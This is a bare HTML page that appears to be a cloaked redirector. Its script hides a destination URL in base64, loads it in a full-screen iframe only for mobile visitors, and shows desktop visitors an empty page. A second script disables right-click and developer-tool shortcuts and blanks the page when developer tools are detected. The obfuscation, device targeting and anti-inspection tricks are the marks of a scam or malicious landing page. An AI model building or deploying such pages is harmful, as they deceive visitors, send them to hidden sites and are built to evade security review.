























































































































































































































































































































































































































































<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <style>
        html, body, iframe {
            width: 100%;
            height: 100%;
            padding: 0;
            margin: 0;
        }
        #wrap {
            width: 100%;
            height: 100%;
        }
        iframe {
            border: none;
        }
        #not-mobile {
            display: none;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            font-size: 2em;
        }
    </style>
</head>
<body>
    <div id="wrap"></div>
    <div id="not-mobile"></div>
    
    <script>
        if (!window.atob) {
            window.atob = function (input) {
                var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
                var output = "";
                var chr1, chr2, chr3;
                var enc1, enc2, enc3, enc4;
                var i = 0;
                input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
                while (i < input.length) {
                    enc1 = keyStr.indexOf(input.charAt(i++));
                    enc2 = keyStr.indexOf(input.charAt(i++));
                    enc3 = keyStr.indexOf(input.charAt(i++));
                    enc4 = keyStr.indexOf(input.charAt(i++));
                    chr1 = (enc1 << 2) | (enc2 >> 4);
                    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                    chr3 = ((enc3 & 3) << 6) | enc4;
                    output = output + String.fromCharCode(chr1);
                    if (enc3 != 64) {
                        output = output + String.fromCharCode(chr2);
                    }
                    if (enc4 != 64) {
                        output = output + String.fromCharCode(chr3);
                    }
                }
                return output;
            };
        }

        function supportsIframe() {
            var iframe = document.createElement('iframe');
            return iframe !== null && typeof iframe !== "undefined";
        }

        function isMobileUser() {
            var userAgent = navigator.userAgent.toLowerCase();
            return /mobile|android|iphone|ipad|ipod|blackberry|windows phone|micromax|nokia|samsung|sony|lg|huawei|xiaomi|oppo|vivo|oneplus|zte|lenovo|meizu|alcatel|asus|coolpad|leeco|nexus|motorola|bluboo|infinix|wechat/.test(userAgent);
        }

        if (!supportsIframe()) {
            var base64Redirect = "aHR0cHM6Ly9zdHlsZS40NzU5NzM5MDU2MjYudG9w";
            window.location.href = atob(base64Redirect);
        } else if (isMobileUser()) {
            (function() {
                var base64 = "aHR0cHM6Ly9zdHlsZS40NzU5NzM5MDU2MjYudG9w";
                var decoded = atob(base64);
                document.getElementById('wrap').innerHTML = '<iframe src="' + decoded + '"></iframe>';
            })();
        } else {
            document.getElementById('wrap').style.display = 'none';
            document.getElementById('not-mobile').style.display = 'flex';
        }
    </script>

    <script>	
		document.addEventListener('contextmenu', function(event) {
            event.preventDefault();
        });

        document.addEventListener('keydown', function(event) {
            if (event.key === 'F12' || (event.ctrlKey && event.shiftKey && event.key === 'I')) {
                event.preventDefault();
            }
        });

        (function() {
            var element = new Image();
            Object.defineProperty(element, 'id', {
                get: function() {
                    window.location.href = 'about:blank';
                }
            });
            console.log(element);
        })();
	</script>
	

	<script>
		var _hmt = _hmt || [];
		(function() {
		var hm = document.createElement("script");
		hm.src = "https://hm.baidu.com/hm.js?3a254b12ee92a7cf060db0da2d5eaf08";
		var s = document.getElementsByTagName("script")[0]; 
		s.parentNode.insertBefore(hm, s);
		})();
	</script>
	
</body>
</html>


